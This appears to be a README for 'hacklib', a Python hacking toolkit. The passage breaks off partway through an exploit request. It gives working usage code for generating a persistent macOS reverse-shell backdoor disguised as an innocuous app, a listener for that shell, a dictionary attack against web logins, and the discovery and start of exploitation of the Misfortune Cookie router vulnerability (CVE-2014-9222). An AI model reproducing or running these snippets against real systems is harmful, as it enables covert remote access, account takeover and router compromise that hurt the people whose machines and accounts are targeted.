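A toolkit for hacking enthusiasts using Python.
Detailed description of the hacklib Python project
hacklib is a Python module for hacking enthusiasts interested in network security. It is currently in active development.
Current features:
- Reverse shell backdooring
- Universal login client for almost all HTTP/HTTPS form-based logins and HTTP Basic Authentication logins
- Port scanning
- SOCKS4/5 proxy scraping and tunneling
Generating a backdoor payload (currently only for Macs):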
    import hacklib

    bd = hacklib.Backdoor()
    # Generates an app that, when run, drops a persistent reverse shell into the system.
    bd.create('127.0.0.1', 9090, 'OSX', 'Funny_Cat_Pictures')
    # Takes the IP and port of the command server, the OS of the target, and the name of the .app
Shell listener (use with the backdoor):
    import hacklib

    # Create instance of Server with the listening port
    >>> s = hacklib.Server(9090)
    >>> s.listen()
    New connection ('127.0.0.1', 51101)
    bash: no job control in this shell
    bash$ whoami
    leon
    bash$ # Sweet!
Simple dictionary attack example with hacklib.AuthClient:
    import hacklib

    ac = hacklib.AuthClient()
    # Get the top 100 most common passwords
    passwords = hacklib.topPasswords(100)
    for p in passwords:
        htmldata = ac.login('http://yourwebsite.com/login', 'admin', p)
        if 'welcome' in htmldata.lower():
            print 'Password is', p
            break
Discovery and exploitation of the Misfortune Cookie vulnerability (CVE-2014-9222) with hacklib.PortScanner():
    >>> import hacklib

    # Discovery
    >>> ps = hacklib.PortScanner()
    >>> ps.scan('192.168.1.1', (80, 81))
    Port 80:
    HTTP/1.1 404 Not Found
    Content-Type: text/html
    Transfer-Encoding: chunked
    Server: RomPager/4.07 UPnP/1.0
    EXT:
    # The banner for port 80 shows us that the server uses RomPager 4.07. This version is exploitable.

    # Exploitation
    >>> payload = '''GET /HTTP/1.1
    Host: 192.168.1.1
    User-Agent: googlebot
    Accept: text/html, application/xhtml+xml, application/xml; q=09, */*; q=0.8
    Accept-Language: en-US, en; q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: C107351277=BBBBBBBBBBBBBBBBBBBB